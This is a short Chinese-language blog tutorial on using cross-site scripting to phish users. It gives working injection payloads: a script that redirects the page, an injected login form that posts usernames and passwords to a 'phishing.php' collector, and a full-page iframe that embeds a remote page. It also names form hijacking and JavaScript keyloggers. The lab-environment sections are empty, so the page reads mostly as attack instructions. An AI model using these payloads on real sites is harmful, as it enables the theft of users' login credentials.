漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法

实验环境:

模拟实验:

重定向钓鱼

把当前页面重定向到一个钓鱼页面,例如重定向到百度,代码如下:

<script>document.location.href="http://www.baidu.com"</script>

漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法

HTML 注入式钓鱼

使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中。该段代码会在正常页面中嵌入一个 Form 表单。

<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>

漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法

iframe 钓鱼

这种方式是通过 标签嵌入远程域的一个页面实施钓鱼。

<iframe src="http://www.baidu.com" height="100%" width="100%"</iframe>
iframe 钓鱼

将构造好的 Flash 文件传入服务器,在目标网站用 或 标签引用即可。

高级钓鱼技术

注入代码劫持 HTML 表单、使用 JavaScript 编写键盘记录器等。

上一篇:CVPR 2021 妆容迁移 CPM SCGAN


下一篇:CVPR顶会论文爬取